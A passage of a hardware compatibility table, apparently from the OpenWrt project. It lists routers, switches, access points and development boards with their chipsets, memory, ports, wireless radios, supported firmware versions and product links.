260 | WiFi Router | Linksys | EA9500 | v1, v1.1 | Available 2021 | 21.02.3 | MU-MIMO front 8 level LEDs | Broadcom BCM4709C0 | 1400 | 2 | 128NAND | 256 | – | 9 | b/g/n | a/n/ac | radio0 just supports channel 36 up to 48 radio2 only 100 up to 140 | Broadcom BCM4366 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/p/P-EA9500/ | ea9500_v1 | https://forum.openwrt.org/t/build-for-linksys-ea9500/1817/1 | View/Edit data |
261 | WiFi Router | Linksys | MR8300 | Available 2020 | 21.02.3 | Qualcomm IPQ4019 | 717 | 4 | 256NAND | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA4019, Qualcomm Atheros QCA9888 | – | 1x 3.0 | https://www.linksys.com/us/p/P-MR8300/ | mr8300 | View/Edit data | ||||
262 | WiFi Router | Linksys | WRT32X | v1 (venom) | Available 2022 | 21.02.3 | Marvell Armada 385 88F6820 | 1866 | 2 | 256NAND | 512 | – | 5 | b/g/n | a/n/ac | Marvell 88W8964 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/support-product?pid=01t34000004FeJ0AAK | wrt32x | https://forum.openwrt.org/t/davidc502-wrt1200ac-wrt1900acx-wrt3200acm-wrt32x-builds/15839/ | View/Edit data | ||
263 | WiFi Router | Linksys | WRT1900AC | v1 (mamba) | unknown 2022 | 21.02.3 | Marvell Armada XP MV78230 | 1300 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | 4×4, no 802.11s mesh support | Marvell 88W8864 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/p/P-WRT1900AC/ | wrt1900ac | View/Edit data | ||
264 | WiFi Router | Linksys | WRT1900AC | v2 (cobra) | unknown 2022 | 21.02.3 | Marvell Armada 385 88F6820 | 1600 | 2 | 128NAND | 512 | – | 5 | b/g/n | a/n/ac | 4×4, no 802.11s mesh support | Marvell 88W8864 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/p/P-WRT1900AC/ | wrt1900ac | View/Edit data | ||
265 | WiFi Router | Linksys | WRT1900ACS | v1 (shelby), v2 (shelby) | Available 2021 | 21.02.3 | Marvell Armada 385 88F6820 | 1600 | 2 | 128NAND | 512 | – | 5 | b/g/n | a/n/ac | No 802.11s mesh support | Marvell 88W8864 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/p/P-WRT1900ACS/ | wrt1900acs | https://forum.openwrt.org/viewtopic.php?id=61904 | View/Edit data | |
266 | WiFi Router | Linksys | WRT3200ACM | v1 (rango) | Available 2022 | 21.02.3 | Marvell Armada 385 88F6820 | 1866 | 2 | 256NAND | 512 | – | 5 | b/g/n | a/n/ac | Marvell 88W8964 | – | 1x 2.0, 1x 3.0 | https://www.linksys.com/us/p/P-WRT3200ACM/ | wrt3200acm | View/Edit data | |||
267 | other | Linksys | WHW01 | v1 | Available 2020 | PR pending | Qualcomm IPQ4018 | 716 | 4 | 256 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm IPQ4018 | – | – | https://www.linksys.com/us/velop/ | whw01_v1 | View/Edit data | |||
268 | WiFi Router | Linksys | EA6350 | v4 | Available 2022 | snapshot | MediaTek MT7621DAT | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7613AEN | – | 1x 3.0 | https://www.linksys.com/us/wireless-routers/traditional-routers/linksys-ea6350-4b-ac1200-dual-band-wifi-5-router/p/p-ea6350v4/ | ea6350_v4 | View/Edit data | |||
269 | WiFi Router | Linksys | EA9200 | unknown 2022 | 21.02.3 | Broadcom BCM4709A0 | 1000 | 2 | 128 | 256 | – | 5 | b/g/n | a/n/ac | Broadcom BCM43602 | ¿ | 1x 2.0, 1x 3.0 | http://¿ | View/Edit data | |||||
270 | Router | Luxul | XBR-4500 | Available 2020 | 21.02.3 | ¿ | ¿ | ¿ | ¿ | ¿ | – | 5 | – | – | – | – | 1x 3.0 | https://www.luxul.com/routers/wired-routers/xbr-4500.aspx | View/Edit data | |||||
271 | WiFi AP | Luxul | XAP-1610 | unknown 2020 | 21.02.3 | Broadcom BCM4709C0 | 1400 | 2 | ¿ | 256 | – | 2 | b/g/n | a/n/ac | Broadcom BCM4366E | – | – | https://www.luxul.com/wireless/wireless-access-points/xap-1610.aspx | View/Edit data | |||||
272 | Router | Luxul | ABR-4500 | Available 2020 | 21.02.3 | ¿ | ¿ | ¿ | ¿ | ¿ | – | 5 | – | – | – | – | 1x 3.0 | https://www.luxul.com/routers/wired-routers/abr-4500.aspx | View/Edit data | |||||
273 | WiFi Router | Luxul | XWR-3150 | unknown 2020 | 21.02.3 | ¿ | ¿ | ¿ | ¿ | ¿ | – | 5 | b/g/n | a/n/ac | ¿ | – | 1x 3.0 | https://www.luxul.com/routers/wireless-routers/xwr-3150.aspx | View/Edit data | |||||
274 | Single Board Computer | Marvell | DB-88F8040-Modular | unknown 2022 | 21.02.3 | Marvell Armada 88F8040 | 2000 | 4 | 256, SD | ¿ | – | 2 | – | – | – | – | 2x 3.0 | View/Edit data | ||||||
275 | Single Board Computer | Marvell | RD-A370-A1 | unknown 2022 | 21.02.3 | Marvell Armada 370 | 1200 | 1 | 1024NAND | 512 | – | 5 | ¿ | ¿ | 2x mini-PCIe | ¿ | 2x 2.0 | View/Edit data | ||||||
276 | Single Board Computer | Marvell | DB-A380-DDR3-AP | unknown 2022 | 17.01.4 | Marvell Armada 38x | 1600 | 2 | 1024NAND | 2048 | – | 3 | ¿ | ¿ | 3x mini-PCIe | ¿ | 1x 2.0, 1x 3.0 | View/Edit data | ||||||
277 | Single Board Computer | Marvell | DB-88F7040-Modular | unknown 2022 | 21.02.3 | Marvell Armada 88F7040 | 1400 | 4 | 128, SD | ¿ | – | 2 | – | – | – | – | 2x 3.0 | View/Edit data | ||||||
278 | Single Board Computer | Marvell | Armada A385 DB AP | unknown 2022 | 21.02.3 | Marvell Armada 385 88F6820 | ¿ | 2 | 1024NAND | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | View/Edit data | ||||||
279 | Single Board Computer | Marvell | Armada A370 DB | unknown 2022 | 21.02.3 | Marvell Armada A370 | ¿ | 1 | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | View/Edit data | ||||||
280 | Single Board Computer | Marvell | DB-88F3720-DDR3 | unknown 2022 | 21.02.3 | Marvell Armada 3700LP 88F3720 | 1000 | 2 | 128, 8192 eMMC | 4096 | – | 1 | – | – | – | – | 1x 2.0, 1x 3.0 | View/Edit data | ||||||
281 | Single Board Computer | Marvell | MACCHIATObin Double Shot | Available 2022 | 21.02.3 | Marvell Armada 8040 | 1600 | 4 | eMMC, microSD | 4096 | – | 1 | – | – | – | – | 1x 3.0, 1x Header | https://macchiatobin.net/product/macchiatobin-double-shot/ | marvell_macchiatobin | View/Edit data | ||||
282 | Single Board Computer | Marvell | MACCHIATObin Single Shot | Available 2020 | 21.02.3 | Marvell Armada 8040 | 2000 | 4 | eMMC, microSD | ¿ | – | 1 | – | – | – | – | 1x 3.0, 1x Header | https://macchiatobin.net/product/macchiatobin-single-shot/ | marvell_macchiatobin | View/Edit data | ||||
283 | Single Board Computer | Marvell | RD-MV784MP-GP | unknown 2022 | 17.01.4 | Marvell Armada XP MV78460 | 1600 | 4 | 1024NAND | ¿ | – | 4 | ¿ | ¿ | 3x PCIe | ¿ | 2x 2.0 | View/Edit data | ||||||
284 | Single Board Computer | Microchip | SAMA5D27 SOM1 EK | unknown 2020 | 19.07.7 | Atmel ATSAMA5D27-D1G-CU | 500 | 1 | microSDHC, SDHC | 128 | 1 | – | – | – | – | – | ¿ | https://www.microchip.com/DevelopmentTools/ProductDetails/PartNO/ATSAMA5D27-SOM1-EK1 | View/Edit data | |||||
285 | Single Board Computer | Microchip | SAMA5D4 Xplained Ultra | unknown 2022 | 21.02.3 | Atmel ATSAM5D44 | 528 | 1 | 512NAND | 512 | 1 | – | – | – | – | 2x 2.0 | https://www.microchip.com/en-us/development-tool/ATSAMA5D4-XULT | View/Edit data | ||||||
286 | Single Board Computer | Microchip | SAMA5D2 Xplained Ultra | unknown 2022 | 21.02.3 | Atmel ATSAM5D27 | 500 | 1 | 4, 4096 eMMC | 512 | 1 | – | – | – | – | 1x 2.0, 1x µUSB (power) | http://¿ | View/Edit data | ||||||
287 | Single Board Computer | MikroTik | RB433AH | Available 2022 | 19.07.10 | Atheros AR7161 | 680 | 1 | 64NAND, microSD | 128 | 3 | – | – | – | – | – | Mod | https://routerboard.com/RB433AH | rb433 | View/Edit data | ||||
288 | Single Board Computer | MikroTik | RB450G | Available 2022 | 19.07.10 | Atheros AR7161 | 680 | 1 | 512NAND | 256 | – | 5 | – | – | – | – | – | https://routerboard.com/RB450G | rb450g | View/Edit data | ||||
289 | Router | MikroTik | RB450Gx4 | Available 2022 | external image | Qualcomm IPQ4019 | 716 | 4 | 512NAND | 1024 | – | 5 | – | – | none | – | – | https://mikrotik.com/product/rb450gx4 | rb450gx4 | https://forum.openwrt.org/t/mikrotik-rb450gx4-support/20427 | View/Edit data | |||
290 | Router | MikroTik | RB750Gr3 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | – | – | – | – | 1x 2.0 | https://mikrotik.com/product/RB750Gr3 | rb750gr3 | https://forum.lede-project.org/t/how-to-install-to-rb750gr3/4654 | View/Edit data | |||
291 | Router | MikroTik | RB760iGS (hEX S) | Available 2020 | 21.02.3 | Buzzer | MediaTek MT7621A | 880 | 2 | 16, microSD | 256 | – | 5 | – | – | – | – | 1x 2.0 | https://mikrotik.com/product/hex_s | rb760igs | View/Edit data | |||
292 | WiFi Router | MikroTik | RB922UAGS-5HPacD | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9557 | 720 | 1 | 128NAND | 128 | – | 1 | – | a/n/ac | Qualcomm Atheros QCA9882 | – | 1x 2.0 | https://mikrotik.com/product/RB922UAGS-5HPacD | View/Edit data | |||||
293 | Single Board Computer | MikroTik | RB951G-2HnD | Available 2022 | 19.07.10 | Gbit ports | Atheros AR9344 | 600 | 1 | 128NAND | 128 | – | 5 | b/g/n | – | Atheros AR9344 | – | 1x 2.0 | http://routerboard.com/RB951G-2HnD | rb951g_2hnd | View/Edit data | |||
294 | Single Board Computer | MikroTik | RB951Ui-2HnD | Available 2022 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | – | b/g/n | – | Atheros AR9344 | – | 1x 2.0 | http://routerboard.com/RB951Ui-2HnD | rb951ui | View/Edit data | ||||
295 | WiFi Router | MikroTik | RB962UiGS-5HacT2HnT (hAP ac) | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Atheros AR9880, Qualcomm Atheros QCA9558 | – | 1x 2.0 | https://routerboard.com/RB962UiGS-5HacT2HnT | View/Edit data | |||||
296 | Router | MikroTik | RB2022iL | Available 2021 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | 5 | – | – | – | – | – | https://mikrotik.com/product/RB2022iL-IN | rb2022 | View/Edit data | ||||
297 | Router | MikroTik | RB2022iLS | Available 2021 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | 5 | – | – | – | – | – | https://mikrotik.com/product/RB2022iLS-IN | rb2022 | View/Edit data | ||||
298 | Single Board Computer | MikroTik | RB2022UAS-2HnD-IN | Available 2021 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | 5 | b/g/n | – | Atheros AR9344 | – | 1x 2.0 | http://www.mikrotik.com.ua/download/rb2022uas-rm.pdf | rb2022uias | View/Edit data | ||||
299 | WiFi Router | MikroTik | RB2022UiAS-2HnD-IN | r2 | Available 2022 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | 5 | b/g/n | – | Atheros AR9344 | – | 1x 2.0 | https://routerboard.com/RB2022UiAS-2HnD-IN | rb2022uias | View/Edit data | |||
300 | WiFi Router | MikroTik | RB2022UiAS-2HnD | Available 2021 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | 5 | b/g/n | – | Atheros AR9344 | – | 1x 2.0, 1x OTG | https://mikrotik.com/product/RB2022UiAS-2HnD | rb2022 | View/Edit data | ||||
301 | Router | MikroTik | RB2022UiAS | r1, r2, r3 | Available 2021 | 19.07.10 | Atheros AR9344 | 600 | 1 | 128NAND | 128 | 5 | 5 | – | – | – | – | 1x 2.0, 1x OTG | https://mikrotik.com/product/RB2022UiAS-IN | rb2022 | View/Edit data | |||
302 | WiFi Router | MikroTik | RBD52G-5HacD2HnD-TC (hAP ac²) | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 716 | 4 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | 1x 2.0 | https://mikrotik.com/product/hap_ac2 | hap_ac2 | View/Edit data | ||||
303 | Single Board Computer | MikroTik | RBM11G | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 256 | – | 1 | – | – | – | – | – | https://mikrotik.com/product/m11g | rbm11g | View/Edit data | ||||
304 | Router | MikroTik | RBM33G | Available 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 256 | – | 3 | – | – | – | – | 1x 3.0 | https://mikrotik.com/product/rbm33g | rbm33g | View/Edit data | ||||
305 | other | MikroTik | RBSXTsqG-5acD (SXTsq 5 ac) | Available 2020 | 21.02.3 | Qualcomm Atheros IPQ4018 | 716 | 4 | 16 | 256 | – | 1 | – | a/n/ac | Qualcomm Atheros IPQ4018 | – | – | https://mikrotik.com/product/sxtsq_5_ac | View/Edit data | |||||
306 | WiFi AP | MikroTik | RB911G-5HPacD | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9557 | 720 | 1 | 128NAND | 128 | – | 1 | – | a/n/ac | Qualcomm Atheros QCA9882 | – | – | https://mikrotik.com/product/RB911G-5HPacD | View/Edit data | |||||
307 | WiFi Router | MikroTik | RB921GS-5HPacD-15S (mANTBox 15s) | Available 2020 | 19.07.10 | Qualcomm Atheros QCA9558 | 720 | 1 | 128NAND | 128 | – | 1 | – | a/n/ac | Qualcomm Atheros QCA9882 | – | – | https://mikrotik.com/product/RB921GS-5HPacD-15S | rb921 | View/Edit data | ||||
308 | Router | MikroTik | RB5009UG S IN | Available 2022 | external image | 2.5 GbE | Marvell Armada 7040 | 1400 | 4 | 1024NAND, 16 | 1024 | – | 7 | – | – | – | – | 1x 3.0 | https://mikrotik.com/product/rb5009ug_s_in | https://forum.openwrt.org/t/add-support-for-mikrotik-rb5009ug/104391/ | View/Edit data | |||
309 | WiFi Router | MikroTik | RBD53iG-5HacD2HnD (hap ac³) | unknown 2022 | snapshot | Qualcomm Atheros IPQ4019 | 716 | 4 | 128NAND, 16 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019 | – | 1x 2.0 | https://mikrotik.com/product/hap_ac3 | View/Edit data | |||||
310 | other | MikroTik | RBDiscG-5acD (DISC Lite5 ac) | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 716 | 4 | 16 | 256 | – | 1 | – | a/n/ac | Qualcomm Atheros IPQ4018 | – | ¿ | https://mikrotik.com/product/disc_lite5_ac | View/Edit data | |||||
311 | other | MINEW | G1-C | unknown 2021 | 21.02.3 | MediaTek MT7628AN | 580 | 1 | 16, microSD | 128 | 1 | – | ¿ | ¿ | ¿ | ¿ | 1x µUSB (power), 2x 2.0 | http://¿ | View/Edit data | |||||
312 | WiFi Router | MQMaker | WiTi Board | v2.0 / 512MB | Available 2022 | 21.02.3 | 6th Gbit Ethernet IP1001 on rgmii2 is not working yet | MediaTek MT7621A | 880 | 2 | 16 | 512 | – | 6 | b/g/n | a/n/ac | 2×2 MIMO | MediaTek MT7602E, MediaTek MT7612E | – | 1x 3.0 | https://mqmaker.com/product/witi-board/ | witi | https://forum.openwrt.org/viewtopic.php?id=59092 | View/Edit data |
313 | WiFi Router | MTC | WR1201 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16, microSD | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7602EN, MediaTek MT7612EN | – | 1x 3.0 | http://forum.openwrt.org/t/support-for-strong-1200/22768 | View/Edit data | |||||
314 | WiFi Router | NEC | Aterm WG2600HP | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ8064 | 1400 | 2 | 32 | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9980 | – | 1x 3.0 | http://www.aterm.jp/product/atermstation/product/warpstar/wg2600hp/index.html | View/Edit data | |||||
315 | WiFi Router | NEC | Aterm WG2600HP3 | unknown 2020 | 21.02.3 | Qualcomm Atheros IPQ8062 | 1000 | 2 | 32 | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9984 | – | – | https://www.aterm.jp/product/atermstation/product/warpstar/wg2600hp3/ | aterm_wg2600hp3 | View/Edit data | ||||
316 | WiFi Router | NETGEAR | DGND3800B | Available 2022 | 21.02.3 | DSL modem, WiFi 2.4GHz partly | Broadcom BCM6368 | 400 | 2 | 128, 128NAND, 32 | 128 | – | 5 | b/g/n | a/n | Broadcom BCM43222 | xDSL | 2x 2.0 | dgnd3700 | https://forum.openwrt.org/viewtopic.php?id=36824 | View/Edit data | |||
317 | Range Extender | NETGEAR | EX6100 | v2 | Available 2022 | 21.02.3 | AP-Extender toggle-switch | Qualcomm Atheros IPQ4018 | 717 | 4 | 16 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | – | https://www.netgear.com/home/products/networking/wifi-range-extenders/EX6100.aspx | View/Edit data | |||
318 | Range Extender | NETGEAR | EX6150 | v2 | Available 2021 | 21.02.3 | AP-Extender toggle-switch | Qualcomm Atheros IPQ4018 | 717 | 4 | 16 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | – | https://www.netgear.com/home/products/networking/wifi-range-extenders/EX6150.aspx | View/Edit data | |||
319 | Range Extender | NETGEAR | EX7300 | v2 | unknown 2021 | snapshot | WiFi 2.4GHz | Qualcomm Atheros QCN5502 | 800 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9984, Qualcomm Atheros QCN5502 | – | – | https://www.netgear.com/home/wifi/range-extenders/ex7300/ | ex6400_ex7300 | View/Edit data | ||
320 | Switch | NETGEAR | GS110TPP | v1 | Available 2021 | 21.02.3 | Ports 9 and 10 may not function properly | Realtek RTL8380M | 500 | 1 | 32 | 128 | – | 10 | – | – | – | – | https://www.netgear.com/business/wired/switches/smart-cloud/gs110tpp/ | View/Edit data | ||||
321 | Switch | NETGEAR | GS308T | 1 | Available 2021 | snapshot | Realtek RTL8380M | 500 | 1 | 32 | 128 | – | 8 | – | – | – | – | – | https://www.netgear.com/support/product/GS308T.aspx | View/Edit data | ||||
322 | Switch | NETGEAR | GS310TP | v1 | Available 2021 | snapshot | Realtek RTL8380M | 500 | 1 | 32 | 128 | – | 8 | – | – | – | – | https://www.netgear.com/business/wired/switches/smart/gs310tp/ | View/Edit data | |||||
323 | WiFi AP | NETGEAR | WAC124 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | 2×2 (2.4 GHz), 4×4 (5 GHz) | MediaTek MT7603, MediaTek MT7615 | – | 1x 2.0 | https://www.netgear.com/business/products/wireless/essentials-wireless/WAC124.aspx | wac124 | View/Edit data | |||
324 | WiFi Router | NETGEAR | R6850 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7615 | – | 1x 2.0 | https://www.netgear.de/home/products/networking/wifi-routers/R6850.aspx | View/Edit data | |||||
325 | WiFi Router | NETGEAR | R6260 | Available 2022 | 21.02.1 | MediaTek MT7621AT | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7615 | – | 1x 2.0 | https://www.netgear.com/home/products/networking/wifi-routers/R6260.aspx | r6260 | View/Edit data | ||||
326 | WiFi Router | NETGEAR | R7800 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ8065 | 1700 | 2 | 128NAND | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9984 | – | 2x 3.0 | https://www.netgear.com/support/product/R7800 | r7800 | https://forum.openwrt.org/t/netgear-r7800-exploration-ipq8065-qca9984/285, https://forum.openwrt.org/t/r7800-back-to-stock-firmware/13973 | View/Edit data | |||
327 | WiFi Router | NETGEAR | R6220 | Available 2020 | 21.02.3 | MediaTek MT7621ST | 880 | 1 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MIMO 2×2 | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 2.0 | http://www.netgear.com/home/products/networking/wifi-routers/R6220.aspx | r6220 | View/Edit data | |||
328 | WiFi Router | NETGEAR | AC2400 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | 2x MT7615 | – | 1x 3.0 | https://www.netgear.com/support/product/AC2400.aspx | View/Edit data | |||||
329 | Modem | NETGEAR | D7800 | Available 2020 | 21.02.3 | DSL modem | Qualcomm Atheros IPQ8064 | 1400 | 2 | 128 | 512 | – | 5 | b/g/n | a/n/ac | 2x Qualcomm Atheros QCA9980 | VDSL2 | 2x 3.0 | https://www.netgear.com/support/product/d7800 | d7800 | https://forum.openwrt.org/viewtopic.php?id=60169 | View/Edit data | ||
330 | Switch | NETGEAR | GS108T | v3 | Available 2021 | 21.02.3 | Ethernet LEDs | Realtek RTL8380M | 500 | 1 | 32 | 128 | – | 8 | – | – | – | – | – | https://www.netgear.com/business/wired/switches/smart-cloud/gs108tv3/ | gs108t_v3 | View/Edit data | ||
331 | WiFi AP | NETGEAR | R6100 | v1 | Available 2021 | 19.07.10 | Atheros AR9344 | 560 | 1 | 128 | 128 | 5 | – | b/g/n | a/n/ac | 2×2 | Atheros AR9344, Qualcomm Atheros QCA9882-2R4E | – | 1x 2.0 | https://www.netgear.com/home/products/networking/wifi-routers/r6100.aspx | r6100 | https://forum.openwrt.org/viewtopic.php?id=50672 | View/Edit data | |
332 | WiFi Router | NETGEAR | R6300 | v1 | Available 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM4706 | 600 | 1 | 128NAND, 2 | 128 | – | 5 | b/g/n | a/n/ac | Broadcom BCM4331, Broadcom BCM4360 | – | 2x 2.0 | http://www.netgear.com/R6300 | r6300_v1 | View/Edit data | ||
333 | WiFi Router | NETGEAR | R6350 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7615 | – | 1x 2.0 | https://jp.netgear.com/home/products/networking/wifi-routers/R6350.aspx | r6350 | View/Edit data | ||||
334 | WiFi Router | NETGEAR | R6800 | v1 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://www.netgear.com/support/product/R6800.aspx | r6800 | http://forum.openwrt.org/t/build-openwrt-for-netgear-r6800/22704/11 | View/Edit data | ||
335 | WiFi Router | NETGEAR | R7000 | Available 2022 | 21.02.3 | WiFi 2.4GHz partly, WiFi 5GHz | Broadcom BCM4709A0 | 1000 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | 3×3 | 2x Broadcom BCM4360 | – | 1x 2.0, 1x 3.0 | https://www.netgear.com/home/products/networking/wifi-routers/R7000.aspx | r7000 | https://forum.openwrt.org/viewtopic.php?id=46717 | View/Edit data | |
336 | WiFi Router | NETGEAR | R7900 | Available 2022 | 21.02.3 | Broadcom BCM4709A0 | 1000 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | Broadcom BCM43602 | – | 1x 3.0 | https://netgear.com/home/products/networking/wifi-routers/R7900.aspx | https://forum.openwrt.org/viewtopic.php?id=64056 | View/Edit data | ||||
337 | WiFi Router | NETGEAR | R8000 | Available 2022 | 21.02.3 | Broadcom BCM4709A0 | 1000 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | Broadcom BCM43602 | – | 1x 2.0, 1x 3.0 | https://netgear.com/home/products/networking/wifi-routers/R8000.aspx | r8000 | https://forum.openwrt.org/viewtopic.php?id=55367 | View/Edit data | |||
338 | WiFi AP | NETGEAR | WAC104 | Available 2020 | 21.02.3 | MediaTek MT7621ST | 880 | 1 | 128NAND | 256 | – | 4 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | – | https://www.netgear.com/business/products/wireless/essentials-wireless/WAC104.aspx | wac104 | View/Edit data | ||||
339 | WiFi AP | NETGEAR | WAC510 | Available 2021 | snapshot | IPQ4018 | 710 | 4 | 128 | 256 | – | 2 | b/g/n | a/n/ac | 2×2:2 MIMO | IPQ4018 | – | – | https://www.netgear.com/business/wifi/access-points/wac510 | wac510 | https://forum.openwrt.org/t/status-of-wac510-port/59867 | View/Edit data | ||
340 | WiFi AP | NETGEAR | WNDAP620 | Available 2020 | 21.02.3 | AppliedMicro APM82181 | 1000 | 1 | 32NAND | 128 | – | 1 | b/g/n | a/n | Atheros AR9380 (mini-PCIe) | – | – | https://www.netgear.com/business/products/wireless/premium-wireless/WNDAP620.aspx | View/Edit data | |||||
341 | WiFi Router | NETGEAR | WNDR3700 | v5 | Available 2022 | 21.02.3 | MediaTek MT7621ST | 880 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MIMO 2×2 | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 2.0 | https://www.netgear.com/home/products/networking/wifi-routers/wndr3700.aspx | wndr3700 | https://forum.openwrt.org/viewtopic.php?id=56737 | View/Edit data | |
342 | WiFi Router | NETGEAR | WNDR4500 | v3 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9563 | 750 | 1 | 128NAND | 128 | – | 5 | b/g/n | a/n | Atheros AR9580, Qualcomm Atheros QCA9563 | – | – | http://¿ | wndr4500_v3 | View/Edit data | |||
343 | WiFi Router | NETGEAR | R7500 | v2 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ8064 | 1400 | 2 | 128 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9880-BR4A, Qualcomm Atheros QCA9980 | – | 2x 3.0 | https://www.netgear.com/support/product/R7500v2 | r7500 | View/Edit data | |||
344 | WiFi Router | NETGEAR | R6230 | Available 2022 | 21.02.3 | MediaTek MT7621ST | 880 | 1 | 128 | 128 | ¿ | 5 | b/g/n | a/n/ac | MIMO 2×2 | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 2.0 | r6230 | View/Edit data | ||||
345 | WiFi Router | NETGEAR | R8000P | Available 2021 | 21.02.3 | Broadcom BCM4906 | 1800 | 2 | 128NAND | 512 | – | 5 | b/g/n | a/n/ac | Broadcom BCM4365E | – | 1x 2.0, 1x 3.0 | https://www.netgear.com/home/wifi/routers/r8000p/ | r8000p | View/Edit data | ||||
346 | WiFi Router | NETGEAR | R7450 | unknown 2021 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://www.netgear.com/home/wifi/routers/r7450/ | View/Edit data | |||||
347 | WiFi Router | NETGEAR | R6900 | v2 | unknown 2021 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 3.0 | https://www.netgear.com/support/product/R6900v2.aspx | r6900_v2 | View/Edit data | |||
348 | WiFi Router | NETGEAR | R7200 | v1 | unknown 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 3.0 | https://www.netgear.com/ca-en/home/wifi/routers/r7200/ | r7200_v1 | View/Edit data | |||
349 | WiFi Router | NETGEAR | XR500 | unknown 2022 | snapshot | Qualcomm Atheros IPQ8065 | 1700 | 2 | 256NAND | 512 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9984 | – | 2x 3.0 | https://www.netgear.com/de/home/online-gaming/routers/xr500/ | View/Edit data | |||||
350 | WiFi Router | NETGEAR | R6700 | v2 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 3.0 | https://www.netgear.com/support/product/R6700V2.aspx | r6700_v2 | View/Edit data | |||
351 | WiFi Router | NETGEAR | SRR60 | unknown 2022 | snapshot | Qualcomm Atheros IPQ4019 | 717 | 4 | 4096 eMMC | 512 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9984 | – | – | http://¿ | View/Edit data | |||||
352 | WiFi Router | NETGEAR | SRS60 | unknown 2022 | snapshot | Qualcomm Atheros IPQ4019 | 717 | 4 | 4096 eMMC | 512 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4019, Qualcomm Atheros QCA9984 | – | – | http://¿ | View/Edit data | |||||
